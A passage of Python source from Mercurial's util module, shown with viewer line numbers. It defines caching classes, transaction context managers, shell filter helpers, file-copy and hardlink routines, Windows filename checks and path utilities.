977 977 >>> b is a
978 978 False
979 979 >>> a is a.preparewrite()
980 980 True
981 981 >>> c = c.preparewrite()
982 982 >>> b is c
983 983 False
984 984 >>> b is b.preparewrite()
985 985 True
986 986 """
987 987
988 988 class cowsortdict(cow, sortdict):
989 989 """copy-on-write sortdict
990 990
991 991 Be sure to call d = d.preparewrite() before writing to d.
992 992 """
993 993
994 994 class transactional(object):
995 995 """Base class for making a transactional type into a context manager."""
996 996 __metaclass__ = abc.ABCMeta
997 997
998 998 @abc.abstractmethod
999 999 def close(self):
1000 1000 """Successfully closes the transaction."""
1001 1001
1002 1002 @abc.abstractmethod
1003 1003 def release(self):
1004 1004 """Marks the end of the transaction.
1005 1005
1006 1006 If the transaction has not been closed, it will be aborted.
1007 1007 """
1008 1008
1009 1009 def __enter__(self):
1010 1010 return self
1011 1011
1012 1012 def __exit__(self, exc_type, exc_val, exc_tb):
1013 1013 try:
1014 1014 if exc_type is None:
1015 1015 self.close()
1016 1016 finally:
1017 1017 self.release()
1018 1018
1019 1019 @contextlib.contextmanager
1020 1020 def acceptintervention(tr=None):
1021 1021 """A context manager that closes the transaction on InterventionRequired
1022 1022
1023 1023 If no transaction was provided, this simply runs the body and returns
1024 1024 """
1025 1025 if not tr:
1026 1026 yield
1027 1027 return
1028 1028 try:
1029 1029 yield
1030 1030 tr.close()
1031 1031 except error.InterventionRequired:
1032 1032 tr.close()
1033 1033 raise
1034 1034 finally:
1035 1035 tr.release()
1036 1036
1037 1037 @contextlib.contextmanager
1038 1038 def nullcontextmanager():
1039 1039 yield
1040 1040
1041 1041 class _lrucachenode(object):
1042 1042 """A node in a doubly linked list.
1043 1043
1044 1044 Holds a reference to nodes on either side as well as a key-value
1045 1045 pair for the dictionary entry.
1046 1046 """
1047 1047 __slots__ = (u'next', u'prev', u'key', u'value')
1048 1048
1049 1049 def __init__(self):
1050 1050 self.next = None
1051 1051 self.prev = None
1052 1052
1053 1053 self.key = _notset
1054 1054 self.value = None
1055 1055
1056 1056 def markempty(self):
1057 1057 """Mark the node as emptied."""
1058 1058 self.key = _notset
1059 1059
1060 1060 class lrucachedict(object):
1061 1061 """Dict that caches most recent accesses and sets.
1062 1062
1063 1063 The dict consists of an actual backing dict - indexed by original
1064 1064 key - and a doubly linked circular list defining the order of entries in
1065 1065 the cache.
1066 1066
1067 1067 The head node is the newest entry in the cache. If the cache is full,
1068 1068 we recycle head.prev and make it the new head. Cache accesses result in
1069 1069 the node being moved to before the existing head and being marked as the
1070 1070 new head node.
1071 1071 """
1072 1072 def __init__(self, max):
1073 1073 self._cache = {}
1074 1074
1075 1075 self._head = head = _lrucachenode()
1076 1076 head.prev = head
1077 1077 head.next = head
1078 1078 self._size = 1
1079 1079 self._capacity = max
1080 1080
1081 1081 def __len__(self):
1082 1082 return len(self._cache)
1083 1083
1084 1084 def __contains__(self, k):
1085 1085 return k in self._cache
1086 1086
1087 1087 def __iter__(self):
1088 1088 # We don't have to iterate in cache order, but why not.
1089 1089 n = self._head
1090 1090 for i in range(len(self._cache)):
1091 1091 yield n.key
1092 1092 n = n.next
1093 1093
1094 1094 def __getitem__(self, k):
1095 1095 node = self._cache[k]
1096 1096 self._movetohead(node)
1097 1097 return node.value
1098 1098
1099 1099 def __setitem__(self, k, v):
1100 1100 node = self._cache.get(k)
1101 1101 # Replace existing value and mark as newest.
1102 1102 if node is not None:
1103 1103 node.value = v
1104 1104 self._movetohead(node)
1105 1105 return
1106 1106
1107 1107 if self._size < self._capacity:
1108 1108 node = self._addcapacity()
1109 1109 else:
1110 1110 # Grab the last/oldest item.
1111 1111 node = self._head.prev
1112 1112
1113 1113 # At capacity. Kill the old entry.
1114 1114 if node.key is not _notset:
1115 1115 del self._cache[node.key]
1116 1116
1117 1117 node.key = k
1118 1118 node.value = v
1119 1119 self._cache[k] = node
1120 1120 # And mark it as newest entry. No need to adjust order since it
1121 1121 # is already self._head.prev.
1122 1122 self._head = node
1123 1123
1124 1124 def __delitem__(self, k):
1125 1125 node = self._cache.pop(k)
1126 1126 node.markempty()
1127 1127
1128 1128 # Temporarily mark as newest item before re-adjusting head to make
1129 1129 # this node the oldest item.
1130 1130 self._movetohead(node)
1131 1131 self._head = node.next
1132 1132
1133 1133 # Additional dict methods.
1134 1134
1135 1135 def get(self, k, default=None):
1136 1136 try:
1137 1137 return self._cache[k].value
1138 1138 except KeyError:
1139 1139 return default
1140 1140
1141 1141 def clear(self):
1142 1142 n = self._head
1143 1143 while n.key is not _notset:
1144 1144 n.markempty()
1145 1145 n = n.next
1146 1146
1147 1147 self._cache.clear()
1148 1148
1149 1149 def copy(self):
1150 1150 result = lrucachedict(self._capacity)
1151 1151 n = self._head.prev
1152 1152 # Iterate in oldest-to-newest order, so the copy has the right ordering
1153 1153 for i in range(len(self._cache)):
1154 1154 result[n.key] = n.value
1155 1155 n = n.prev
1156 1156 return result
1157 1157
1158 1158 def _movetohead(self, node):
1159 1159 """Mark a node as the newest, making it the new head.
1160 1160
1161 1161 When a node is accessed, it becomes the freshest entry in the LRU
1162 1162 list, which is denoted by self._head.
1163 1163
1164 1164 Visually, let's make ``N`` the new head node (* denotes head):
1165 1165
1166 1166 previous/oldest <-> head <-> next/next newest
1167 1167
1168 1168 ----<->--- A* ---<->-----
1169 1169 | |
1170 1170 E <-> D <-> N <-> C <-> B
1171 1171
1172 1172 To:
1173 1173
1174 1174 ----<->--- N* ---<->-----
1175 1175 | |
1176 1176 E <-> D <-> C <-> B <-> A
1177 1177
1178 1178 This requires the following moves:
1179 1179
1180 1180 C.next = D (node.prev.next = node.next)
1181 1181 D.prev = C (node.next.prev = node.prev)
1182 1182 E.next = N (head.prev.next = node)
1183 1183 N.prev = E (node.prev = head.prev)
1184 1184 N.next = A (node.next = head)
1185 1185 A.prev = N (head.prev = node)
1186 1186 """
1187 1187 head = self._head
1188 1188 # C.next = D
1189 1189 node.prev.next = node.next
1190 1190 # D.prev = C
1191 1191 node.next.prev = node.prev
1192 1192 # N.prev = E
1193 1193 node.prev = head.prev
1194 1194 # N.next = A
1195 1195 # It is tempting to do just "head" here, however if node is
1196 1196 # adjacent to head, this will do bad things.
1197 1197 node.next = head.prev.next
1198 1198 # E.next = N
1199 1199 node.next.prev = node
1200 1200 # A.prev = N
1201 1201 node.prev.next = node
1202 1202
1203 1203 self._head = node
1204 1204
1205 1205 def _addcapacity(self):
1206 1206 """Add a node to the circular linked list.
1207 1207
1208 1208 The new node is inserted before the head node.
1209 1209 """
1210 1210 head = self._head
1211 1211 node = _lrucachenode()
1212 1212 head.prev.next = node
1213 1213 node.prev = head.prev
1214 1214 node.next = head
1215 1215 head.prev = node
1216 1216 self._size += 1
1217 1217 return node
1218 1218
1219 1219 def lrucachefunc(func):
1220 1220 '''cache most recent results of function calls'''
1221 1221 cache = {}
1222 1222 order = collections.deque()
1223 1223 if func.__code__.co_argcount == 1:
1224 1224 def f(arg):
1225 1225 if arg not in cache:
1226 1226 if len(cache) > 20:
1227 1227 del cache[order.popleft()]
1228 1228 cache[arg] = func(arg)
1229 1229 else:
1230 1230 order.remove(arg)
1231 1231 order.append(arg)
1232 1232 return cache[arg]
1233 1233 else:
1234 1234 def f(*args):
1235 1235 if args not in cache:
1236 1236 if len(cache) > 20:
1237 1237 del cache[order.popleft()]
1238 1238 cache[args] = func(*args)
1239 1239 else:
1240 1240 order.remove(args)
1241 1241 order.append(args)
1242 1242 return cache[args]
1243 1243
1244 1244 return f
1245 1245
1246 1246 class propertycache(object):
1247 1247 def __init__(self, func):
1248 1248 self.func = func
1249 1249 self.name = func.__name__
1250 1250 def __get__(self, obj, type=None):
1251 1251 result = self.func(obj)
1252 1252 self.cachevalue(obj, result)
1253 1253 return result
1254 1254
1255 1255 def cachevalue(self, obj, value):
1256 1256 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
1257 1257 obj.__dict__[self.name] = value
1258 1258
1259 1259 def clearcachedproperty(obj, prop):
1260 1260 '''clear a cached property value, if one has been set'''
1261 1261 if prop in obj.__dict__:
1262 1262 del obj.__dict__[prop]
1263 1263
1264 1264 def pipefilter(s, cmd):
1265 1265 '''filter string S through command CMD, returning its output'''
1266 1266 p = subprocess.Popen(cmd, shell=True, close_fds=closefds,
1267 1267 stdin=subprocess.PIPE, stdout=subprocess.PIPE)
1268 1268 pout, perr = p.communicate(s)
1269 1269 return pout
1270 1270
1271 1271 def tempfilter(s, cmd):
1272 1272 '''filter string S through a pair of temporary files with CMD.
1273 1273 CMD is used as a template to create the real command to be run,
1274 1274 with the strings INFILE and OUTFILE replaced by the real names of
1275 1275 the temporary files generated.'''
1276 1276 inname, outname = None, None
1277 1277 try:
1278 1278 infd, inname = tempfile.mkstemp(prefix='hg-filter-in-')
1279 1279 fp = os.fdopen(infd, pycompat.sysstr('wb'))
1280 1280 fp.write(s)
1281 1281 fp.close()
1282 1282 outfd, outname = tempfile.mkstemp(prefix='hg-filter-out-')
1283 1283 os.close(outfd)
1284 1284 cmd = cmd.replace('INFILE', inname)
1285 1285 cmd = cmd.replace('OUTFILE', outname)
1286 1286 code = os.system(cmd)
1287 1287 if pycompat.sysplatform == 'OpenVMS' and code & 1:
1288 1288 code = 0
1289 1289 if code:
1290 1290 raise Abort(_("command '%s' failed: %s") %
1291 1291 (cmd, explainexit(code)))
1292 1292 return readfile(outname)
1293 1293 finally:
1294 1294 try:
1295 1295 if inname:
1296 1296 os.unlink(inname)
1297 1297 except OSError:
1298 1298 pass
1299 1299 try:
1300 1300 if outname:
1301 1301 os.unlink(outname)
1302 1302 except OSError:
1303 1303 pass
1304 1304
1305 1305 filtertable = {
1306 1306 'tempfile:': tempfilter,
1307 1307 'pipe:': pipefilter,
1308 1308 }
1309 1309
1310 1310 def filter(s, cmd):
1311 1311 "filter a string through a command that transforms its input to its output"
1312 1312 for name, fn in filtertable.iteritems():
1313 1313 if cmd.startswith(name):
1314 1314 return fn(s, cmd[len(name):].lstrip())
1315 1315 return pipefilter(s, cmd)
1316 1316
1317 1317 def binary(s):
1318 1318 """return true if a string is binary data"""
1319 1319 return bool(s and '\0' in s)
1320 1320
1321 1321 def increasingchunks(source, min=1024, max=65536):
1322 1322 '''return no less than min bytes per chunk while data remains,
1323 1323 doubling min after each chunk until it reaches max'''
1324 1324 def log2(x):
1325 1325 if not x:
1326 1326 return 0
1327 1327 i = 0
1328 1328 while x:
1329 1329 x >>= 1
1330 1330 i += 1
1331 1331 return i - 1
1332 1332
1333 1333 buf = []
1334 1334 blen = 0
1335 1335 for chunk in source:
1336 1336 buf.append(chunk)
1337 1337 blen += len(chunk)
1338 1338 if blen >= min:
1339 1339 if min < max:
1340 1340 min = min << 1
1341 1341 nmin = 1 << log2(blen)
1342 1342 if nmin > min:
1343 1343 min = nmin
1344 1344 if min > max:
1345 1345 min = max
1346 1346 yield ''.join(buf)
1347 1347 blen = 0
1348 1348 buf = []
1349 1349 if buf:
1350 1350 yield ''.join(buf)
1351 1351
1352 1352 Abort = error.Abort
1353 1353
1354 1354 def always(fn):
1355 1355 return True
1356 1356
1357 1357 def never(fn):
1358 1358 return False
1359 1359
1360 1360 def nogc(func):
1361 1361 """disable garbage collector
1362 1362
1363 1363 Python's garbage collector triggers a GC each time a certain number of
1364 1364 container objects (the number being defined by gc.get_threshold()) are
1365 1365 allocated even when marked not to be tracked by the collector. Tracking has
1366 1366 no effect on when GCs are triggered, only on what objects the GC looks
1367 1367 into. As a workaround, disable GC while building complex (huge)
1368 1368 containers.
1369 1369
1370 1370 This garbage collector issue have been fixed in 2.7. But it still affect
1371 1371 CPython's performance.
1372 1372 """
1373 1373 def wrapper(*args, **kwargs):
1374 1374 gcenabled = gc.isenabled()
1375 1375 gc.disable()
1376 1376 try:
1377 1377 return func(*args, **kwargs)
1378 1378 finally:
1379 1379 if gcenabled:
1380 1380 gc.enable()
1381 1381 return wrapper
1382 1382
1383 1383 if pycompat.ispypy:
1384 1384 # PyPy runs slower with gc disabled
1385 1385 nogc = lambda x: x
1386 1386
1387 1387 def pathto(root, n1, n2):
1388 1388 '''return the relative path from one place to another.
1389 1389 root should use os.sep to separate directories
1390 1390 n1 should use os.sep to separate directories
1391 1391 n2 should use "/" to separate directories
1392 1392 returns an os.sep-separated path.
1393 1393
1394 1394 If n1 is a relative path, it's assumed it's
1395 1395 relative to root.
1396 1396 n2 should always be relative to root.
1397 1397 '''
1398 1398 if not n1:
1399 1399 return localpath(n2)
1400 1400 if os.path.isabs(n1):
1401 1401 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1402 1402 return os.path.join(root, localpath(n2))
1403 1403 n2 = '/'.join((pconvert(root), n2))
1404 1404 a, b = splitpath(n1), n2.split('/')
1405 1405 a.reverse()
1406 1406 b.reverse()
1407 1407 while a and b and a[-1] == b[-1]:
1408 1408 a.pop()
1409 1409 b.pop()
1410 1410 b.reverse()
1411 1411 return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
1412 1412
1413 1413 def mainfrozen():
1414 1414 """return True if we are a frozen executable.
1415 1415
1416 1416 The code supports py2exe (most common, Windows only) and tools/freeze
1417 1417 (portable, not much used).
1418 1418 """
1419 1419 return (safehasattr(sys, "frozen") or # new py2exe
1420 1420 safehasattr(sys, "importers") or # old py2exe
1421 1421 imp.is_frozen(u"__main__")) # tools/freeze
1422 1422
1423 1423 # the location of data files matching the source code
1424 1424 if mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
1425 1425 # executable version (py2exe) doesn't support __file__
1426 1426 datapath = os.path.dirname(pycompat.sysexecutable)
1427 1427 else:
1428 1428 datapath = os.path.dirname(pycompat.fsencode(__file__))
1429 1429
1430 1430 i18n.setdatapath(datapath)
1431 1431
1432 1432 _hgexecutable = None
1433 1433
1434 1434 def hgexecutable():
1435 1435 """return location of the 'hg' executable.
1436 1436
1437 1437 Defaults to $HG or 'hg' in the search path.
1438 1438 """
1439 1439 if _hgexecutable is None:
1440 1440 hg = encoding.environ.get('HG')
1441 1441 mainmod = sys.modules[pycompat.sysstr('__main__')]
1442 1442 if hg:
1443 1443 _sethgexecutable(hg)
1444 1444 elif mainfrozen():
1445 1445 if getattr(sys, 'frozen', None) == 'macosx_app':
1446 1446 # Env variable set by py2app
1447 1447 _sethgexecutable(encoding.environ['EXECUTABLEPATH'])
1448 1448 else:
1449 1449 _sethgexecutable(pycompat.sysexecutable)
1450 1450 elif (os.path.basename(
1451 1451 pycompat.fsencode(getattr(mainmod, '__file__', ''))) == 'hg'):
1452 1452 _sethgexecutable(pycompat.fsencode(mainmod.__file__))
1453 1453 else:
1454 1454 exe = findexe('hg') or os.path.basename(sys.argv[0])
1455 1455 _sethgexecutable(exe)
1456 1456 return _hgexecutable
1457 1457
1458 1458 def _sethgexecutable(path):
1459 1459 """set location of the 'hg' executable"""
1460 1460 global _hgexecutable
1461 1461 _hgexecutable = path
1462 1462
1463 1463 def _isstdout(f):
1464 1464 fileno = getattr(f, 'fileno', None)
1465 1465 try:
1466 1466 return fileno and fileno() == sys.__stdout__.fileno()
1467 1467 except io.UnsupportedOperation:
1468 1468 return False # fileno() raised UnsupportedOperation
1469 1469
1470 1470 def shellenviron(environ=None):
1471 1471 """return environ with optional override, useful for shelling out"""
1472 1472 def py2shell(val):
1473 1473 'convert python object into string that is useful to shell'
1474 1474 if val is None or val is False:
1475 1475 return '0'
1476 1476 if val is True:
1477 1477 return '1'
1478 1478 return pycompat.bytestr(val)
1479 1479 env = dict(encoding.environ)
1480 1480 if environ:
1481 1481 env.update((k, py2shell(v)) for k, v in environ.iteritems())
1482 1482 env['HG'] = hgexecutable()
1483 1483 return env
1484 1484
1485 1485 def system(cmd, environ=None, cwd=None, out=None):
1486 1486 '''enhanced shell command execution.
1487 1487 run with environment maybe modified, maybe in different dir.
1488 1488
1489 1489 if out is specified, it is assumed to be a file-like object that has a
1490 1490 write() method. stdout and stderr will be redirected to out.'''
1491 1491 try:
1492 1492 stdout.flush()
1493 1493 except Exception:
1494 1494 pass
1495 1495 cmd = quotecommand(cmd)
1496 1496 env = shellenviron(environ)
1497 1497 if out is None or _isstdout(out):
1498 1498 rc = subprocess.call(cmd, shell=True, close_fds=closefds,
1499 1499 env=env, cwd=cwd)
1500 1500 else:
1501 1501 proc = subprocess.Popen(cmd, shell=True, close_fds=closefds,
1502 1502 env=env, cwd=cwd, stdout=subprocess.PIPE,
1503 1503 stderr=subprocess.STDOUT)
1504 1504 for line in iter(proc.stdout.readline, ''):
1505 1505 out.write(line)
1506 1506 proc.wait()
1507 1507 rc = proc.returncode
1508 1508 if pycompat.sysplatform == 'OpenVMS' and rc & 1:
1509 1509 rc = 0
1510 1510 return rc
1511 1511
1512 1512 def checksignature(func):
1513 1513 '''wrap a function with code to check for calling errors'''
1514 1514 def check(*args, **kwargs):
1515 1515 try:
1516 1516 return func(*args, **kwargs)
1517 1517 except TypeError:
1518 1518 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1519 1519 raise error.SignatureError
1520 1520 raise
1521 1521
1522 1522 return check
1523 1523
1524 1524 # a whilelist of known filesystems where hardlink works reliably
1525 1525 _hardlinkfswhitelist = {
1526 1526 'btrfs',
1527 1527 'ext2',
1528 1528 'ext3',
1529 1529 'ext4',
1530 1530 'hfs',
1531 1531 'jfs',
1532 1532 'NTFS',
1533 1533 'reiserfs',
1534 1534 'tmpfs',
1535 1535 'ufs',
1536 1536 'xfs',
1537 1537 'zfs',
1538 1538 }
1539 1539
1540 1540 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1541 1541 '''copy a file, preserving mode and optionally other stat info like
1542 1542 atime/mtime
1543 1543
1544 1544 checkambig argument is used with filestat, and is useful only if
1545 1545 destination file is guarded by any lock (e.g. repo.lock or
1546 1546 repo.wlock).
1547 1547
1548 1548 copystat and checkambig should be exclusive.
1549 1549 '''
1550 1550 assert not (copystat and checkambig)
1551 1551 oldstat = None
1552 1552 if os.path.lexists(dest):
1553 1553 if checkambig:
1554 1554 oldstat = checkambig and filestat.frompath(dest)
1555 1555 unlink(dest)
1556 1556 if hardlink:
1557 1557 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1558 1558 # unless we are confident that dest is on a whitelisted filesystem.
1559 1559 try:
1560 1560 fstype = getfstype(os.path.dirname(dest))
1561 1561 except OSError:
1562 1562 fstype = None
1563 1563 if fstype not in _hardlinkfswhitelist:
1564 1564 hardlink = False
1565 1565 if hardlink:
1566 1566 try:
1567 1567 oslink(src, dest)
1568 1568 return
1569 1569 except (IOError, OSError):
1570 1570 pass # fall back to normal copy
1571 1571 if os.path.islink(src):
1572 1572 os.symlink(os.readlink(src), dest)
1573 1573 # copytime is ignored for symlinks, but in general copytime isn't needed
1574 1574 # for them anyway
1575 1575 else:
1576 1576 try:
1577 1577 shutil.copyfile(src, dest)
1578 1578 if copystat:
1579 1579 # copystat also copies mode
1580 1580 shutil.copystat(src, dest)
1581 1581 else:
1582 1582 shutil.copymode(src, dest)
1583 1583 if oldstat and oldstat.stat:
1584 1584 newstat = filestat.frompath(dest)
1585 1585 if newstat.isambig(oldstat):
1586 1586 # stat of copied file is ambiguous to original one
1587 1587 advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff
1588 1588 os.utime(dest, (advanced, advanced))
1589 1589 except shutil.Error as inst:
1590 1590 raise Abort(str(inst))
1591 1591
1592 1592 def copyfiles(src, dst, hardlink=None, progress=lambda t, pos: None):
1593 1593 """Copy a directory tree using hardlinks if possible."""
1594 1594 num = 0
1595 1595
1596 1596 gettopic = lambda: hardlink and _('linking') or _('copying')
1597 1597
1598 1598 if os.path.isdir(src):
1599 1599 if hardlink is None:
1600 1600 hardlink = (os.stat(src).st_dev ==
1601 1601 os.stat(os.path.dirname(dst)).st_dev)
1602 1602 topic = gettopic()
1603 1603 os.mkdir(dst)
1604 1604 for name, kind in listdir(src):
1605 1605 srcname = os.path.join(src, name)
1606 1606 dstname = os.path.join(dst, name)
1607 1607 def nprog(t, pos):
1608 1608 if pos is not None:
1609 1609 return progress(t, pos + num)
1610 1610 hardlink, n = copyfiles(srcname, dstname, hardlink, progress=nprog)
1611 1611 num += n
1612 1612 else:
1613 1613 if hardlink is None:
1614 1614 hardlink = (os.stat(os.path.dirname(src)).st_dev ==
1615 1615 os.stat(os.path.dirname(dst)).st_dev)
1616 1616 topic = gettopic()
1617 1617
1618 1618 if hardlink:
1619 1619 try:
1620 1620 oslink(src, dst)
1621 1621 except (IOError, OSError):
1622 1622 hardlink = False
1623 1623 shutil.copy(src, dst)
1624 1624 else:
1625 1625 shutil.copy(src, dst)
1626 1626 num += 1
1627 1627 progress(topic, num)
1628 1628 progress(topic, None)
1629 1629
1630 1630 return hardlink, num
1631 1631
1632 1632 _winreservednames = {
1633 1633 'con', 'prn', 'aux', 'nul',
1634 1634 'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
1635 1635 'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
1636 1636 }
1637 1637 _winreservedchars = ':*?"<>|'
1638 1638 def checkwinfilename(path):
1639 1639 r'''Check that the base-relative path is a valid filename on Windows.
1640 1640 Returns None if the path is ok, or a UI string describing the problem.
1641 1641
1642 1642 >>> checkwinfilename(b"just/a/normal/path")
1643 1643 >>> checkwinfilename(b"foo/bar/con.xml")
1644 1644 "filename contains 'con', which is reserved on Windows"
1645 1645 >>> checkwinfilename(b"foo/con.xml/bar")
1646 1646 "filename contains 'con', which is reserved on Windows"
1647 1647 >>> checkwinfilename(b"foo/bar/xml.con")
1648 1648 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
1649 1649 "filename contains 'AUX', which is reserved on Windows"
1650 1650 >>> checkwinfilename(b"foo/bar/bla:.txt")
1651 1651 "filename contains ':', which is reserved on Windows"
1652 1652 >>> checkwinfilename(b"foo/bar/b\07la.txt")
1653 1653 "filename contains '\\x07', which is invalid on Windows"
1654 1654 >>> checkwinfilename(b"foo/bar/bla ")
1655 1655 "filename ends with ' ', which is not allowed on Windows"
1656 1656 >>> checkwinfilename(b"../bar")
1657 1657 >>> checkwinfilename(b"foo\\")
1658 1658 "filename ends with '\\', which is invalid on Windows"
1659 1659 >>> checkwinfilename(b"foo\\/bar")
1660 1660 "directory name ends with '\\', which is invalid on Windows"
1661 1661 '''
1662 1662 if path.endswith('\\'):
1663 1663 return _("filename ends with '\\', which is invalid on Windows")
1664 1664 if '\\/' in path:
1665 1665 return _("directory name ends with '\\', which is invalid on Windows")
1666 1666 for n in path.replace('\\', '/').split('/'):
1667 1667 if not n:
1668 1668 continue
1669 1669 for c in _filenamebytestr(n):
1670 1670 if c in _winreservedchars:
1671 1671 return _("filename contains '%s', which is reserved "
1672 1672 "on Windows") % c
1673 1673 if ord(c) <= 31:
1674 1674 return _("filename contains '%s', which is invalid "
1675 1675 "on Windows") % escapestr(c)
1676 1676 base = n.split('.')[0]
1677 1677 if base and base.lower() in _winreservednames:
1678 1678 return _("filename contains '%s', which is reserved "
1679 1679 "on Windows") % base
1680 1680 t = n[-1:]
1681 1681 if t in '. ' and n not in '..':
1682 1682 return _("filename ends with '%s', which is not allowed "
1683 1683 "on Windows") % t
1684 1684
1685 1685 if pycompat.iswindows:
1686 1686 checkosfilename = checkwinfilename
1687 1687 timer = time.clock
1688 1688 else:
1689 1689 checkosfilename = platform.checkosfilename
1690 1690 timer = time.time
1691 1691
1692 1692 if safehasattr(time, "perf_counter"):
1693 1693 timer = time.perf_counter
1694 1694
1695 1695 def makelock(info, pathname):
1696 1696 try:
1697 1697 return os.symlink(info, pathname)
1698 1698 except OSError as why:
1699 1699 if why.errno == errno.EEXIST:
1700 1700 raise
1701 1701 except AttributeError: # no symlink in os
1702 1702 pass
1703 1703
1704 1704 ld = os.open(pathname, os.O_CREAT | os.O_WRONLY | os.O_EXCL)
1705 1705 os.write(ld, info)
1706 1706 os.close(ld)
1707 1707
1708 1708 def readlock(pathname):
1709 1709 try:
1710 1710 return os.readlink(pathname)
1711 1711 except OSError as why:
1712 1712 if why.errno not in (errno.EINVAL, errno.ENOSYS):
1713 1713 raise
1714 1714 except AttributeError: # no symlink in os
1715 1715 pass
1716 1716 fp = posixfile(pathname)
1717 1717 r = fp.read()
1718 1718 fp.close()
1719 1719 return r
1720 1720
1721 1721 def fstat(fp):
1722 1722 '''stat file object that may not have fileno method.'''
1723 1723 try:
1724 1724 return os.fstat(fp.fileno())
1725 1725 except AttributeError:
1726 1726 return os.stat(fp.name)
1727 1727
1728 1728 # File system features
1729 1729
1730 1730 def fscasesensitive(path):
1731 1731 """
1732 1732 Return true if the given path is on a case-sensitive filesystem
1733 1733
1734 1734 Requires a path (like /foo/.hg) ending with a foldable final
1735 1735 directory component.
1736 1736 """
1737 1737 s1 = os.lstat(path)
1738 1738 d, b = os.path.split(path)
1739 1739 b2 = b.upper()
1740 1740 if b == b2:
1741 1741 b2 = b.lower()
1742 1742 if b == b2:
1743 1743 return True # no evidence against case sensitivity
1744 1744 p2 = os.path.join(d, b2)
1745 1745 try:
1746 1746 s2 = os.lstat(p2)
1747 1747 if s2 == s1:
1748 1748 return False
1749 1749 return True
1750 1750 except OSError:
1751 1751 return True
1752 1752
1753 1753 try:
1754 1754 import re2
1755 1755 _re2 = None
1756 1756 except ImportError:
1757 1757 _re2 = False
1758 1758
1759 1759 class _re(object):
1760 1760 def _checkre2(self):
1761 1761 global _re2
1762 1762 try:
1763 1763 # check if match works, see issue3964
1764 1764 _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
1765 1765 except ImportError:
1766 1766 _re2 = False
1767 1767
1768 1768 def compile(self, pat, flags=0):
1769 1769 '''Compile a regular expression, using re2 if possible
1770 1770
1771 1771 For best performance, use only re2-compatible regexp features. The
1772 1772 only flags from the re module that are re2-compatible are
1773 1773 IGNORECASE and MULTILINE.'''
1774 1774 if _re2 is None:
1775 1775 self._checkre2()
1776 1776 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
1777 1777 if flags & remod.IGNORECASE:
1778 1778 pat = '(?i)' + pat
1779 1779 if flags & remod.MULTILINE:
1780 1780 pat = '(?m)' + pat
1781 1781 try:
1782 1782 return re2.compile(pat)
1783 1783 except re2.error:
1784 1784 pass
1785 1785 return remod.compile(pat, flags)
1786 1786
1787 1787 @propertycache
1788 1788 def escape(self):
1789 1789 '''Return the version of escape corresponding to self.compile.
1790 1790
1791 1791 This is imperfect because whether re2 or re is used for a particular
1792 1792 function depends on the flags, etc, but it's the best we can do.
1793 1793 '''
1794 1794 global _re2
1795 1795 if _re2 is None:
1796 1796 self._checkre2()
1797 1797 if _re2:
1798 1798 return re2.escape
1799 1799 else:
1800 1800 return remod.escape
1801 1801
1802 1802 re = _re()
1803 1803
1804 1804 _fspathcache = {}
1805 1805 def fspath(name, root):
1806 1806 '''Get name in the case stored in the filesystem
1807 1807
1808 1808 The name should be relative to root, and be normcase-ed for efficiency.
1809 1809
1810 1810 Note that this function is unnecessary, and should not be
1811 1811 called, for case-sensitive filesystems (simply because it's expensive).
1812 1812
1813 1813 The root should be normcase-ed, too.
1814 1814 '''
1815 1815 def _makefspathcacheentry(dir):
1816 1816 return dict((normcase(n), n) for n in os.listdir(dir))
1817 1817
1818 1818 seps = pycompat.ossep
1819 1819 if pycompat.osaltsep:
1820 1820 seps = seps + pycompat.osaltsep
1821 1821 # Protect backslashes. This gets silly very quickly.
1822 1822 seps.replace('\\','\\\\')
1823 1823 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
1824 1824 dir = os.path.normpath(root)
1825 1825 result = []
1826 1826 for part, sep in pattern.findall(name):
1827 1827 if sep:
1828 1828 result.append(sep)
1829 1829 continue
1830 1830
1831 1831 if dir not in _fspathcache:
1832 1832 _fspathcache[dir] = _makefspathcacheentry(dir)
1833 1833 contents = _fspathcache[dir]
1834 1834
1835 1835 found = contents.get(part)
1836 1836 if not found:
1837 1837 # retry "once per directory" per "dirstate.walk" which
1838 1838 # may take place for each patches of "hg qpush", for example
1839 1839 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
1840 1840 found = contents.get(part)
1841 1841
1842 1842 result.append(found or part)
1843 1843 dir = os.path.join(dir, part)
1844 1844
1845 1845 return ''.join(result)
1846 1846
1847 1847 def checknlink(testfile):
1848 1848 '''check whether hardlink count reporting works properly'''
1849 1849
1850 1850 # testfile may be open, so we need a separate file for checking to
1851 1851 # work around issue2543 (or testfile may get lost on Samba shares)
1852 1852 f1, f2, fp = None, None, None
1853 1853 try:
1854 1854 fd, f1 = tempfile.mkstemp(prefix='.%s-' % os.path.basename(testfile),
1855 1855 suffix='1~', dir=os.path.dirname(testfile))
1856 1856 os.close(fd)
1857 1857 f2 = '%s2~' % f1[:-2]
1858 1858
1859 1859 oslink(f1, f2)
1860 1860 # nlinks() may behave differently for files on Windows shares if
1861 1861 # the file is open.
1862 1862 fp = posixfile(f2)
1863 1863 return nlinks(f2) > 1
1864 1864 except OSError:
1865 1865 return False
1866 1866 finally:
1867 1867 if fp is not None:
1868 1868 fp.close()
1869 1869 for f in (f1, f2):
1870 1870 try:
1871 1871 if f is not None:
1872 1872 os.unlink(f)
1873 1873 except OSError:
1874 1874 pass
1875 1875
1876 1876 def endswithsep(path):
1877 1877 '''Check path ends with os.sep or os.altsep.'''
1878 1878 return (path.endswith(pycompat.ossep)
1879 1879 or pycompat.osaltsep and path.endswith(pycompat.osaltsep))
1880 1880
1881 1881 def splitpath(path):
1882 1882 '''Split path by os.sep.
1883 1883 Note that this function does not use os.altsep because this is
1884 1884 an alternative of simple "xxx.split(os.sep)".
1885 1885 It is recommended to use os.path.normpath() before using this
1886 1886 function if need.'''
